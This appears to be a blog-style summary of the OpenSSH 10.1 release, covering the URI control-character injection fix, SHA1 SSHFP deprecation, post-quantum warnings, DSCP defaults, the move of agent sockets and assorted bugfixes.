The OpenSSH team has just announced the release of OpenSSH 10.1. This update brings a mix of security hardening, protocol deprecations, and some potentially disruptive changes to defaults — the kind of release where sysadmins and developers should read the changelog closely before rolling it out everywhere.
Security and Deprecations
- Control character injection fix:
ssh(1)now blocks usernames with control characters or\0inssh://URIs. This closes off an injection vector whenProxyCommandand%uexpansions were in play. Reported by David Leadbeater. - SHA1 SSHFP records are officially on the chopping block. A future release will ignore SHA1-based DNS SSHFPs entirely, generating only SHA256. If you rely on old DNSSEC key fingerprints, start updating now.
Post-Quantum Warning
OpenSSH 10.1 introduces a warning when non-post-quantum key exchange algorithms are negotiated. The motivation: “store now, decrypt later” attacks. The warning is controlled by a new WarnWeakCrypto option (default: on). The project has a page on post-quantum readiness with more context.
This is not post-quantum crypto support yet, but the groundwork for flagging weaker algorithms.
DSCP / IPQoS Overhaul
One of the bigger behavioral changes: OpenSSH has revised its DSCP (DiffServ) defaults for traffic prioritization.
- Interactive sessions (e.g. shells) now use Expedited Forwarding (EF) by default.
- Non-interactive traffic (e.g.
sftp) falls back to the system default DSCP marking. - OpenSSH will dynamically switch DSCP values depending on what kind of channels are active in the connection.
Additionally, the old IPv4 ToS keywords (lowdelay, throughput, etc.) are now deprecated and ignored. If you had legacy IPQoS configs, they’ll silently fall back to system defaults.
Other Notable Changes
- ssh-agent socket paths moved from
/tmpto~/.ssh/agent, reducing exposure from processes that can access/tmp. The agent now has cleanup logic for stale sockets. - XMSS keys removed (experimental post-quantum scheme that never shipped as default). A new PQC signature scheme is expected in the future.
- ssh-add now auto-removes certificates shortly after they expire, with a grace period.
- Unit test framework gained benchmarking support (
make unit-bench).
Bugfix Highlights
- Fixed some subtle race conditions in
sshd(8)around process exits and MaxStartups. sshdconfigs can now grow to 4MB (up from 256KB).- sftp now correctly surfaces failed writes even if a later one succeeded.
- Several memory leaks squashed (found via LeakSanitizer, Coverity, and manual review).
OpenSSH remains one of the most widely deployed pieces of security-critical software on the internet. The 10.1 release is not just about fixing bugs — it reflects the project’s long-standing philosophy of tightening security defaults and nudging operators toward better practices:
- Phasing out SHA1 entirely.
- Preparing the ecosystem for a post-quantum world.
- Modernizing QoS handling for real-world networks.
As always, the release tarballs and checksums are up, with SHA256 signatures (note: base64, not hex).
If you’re running OpenSSH in production, this is one of those “test before wide rollout” releases — especially if you rely on legacy IPQoS configs, SHA1 SSHFP records, or scripts that assume agent sockets live in /tmp.
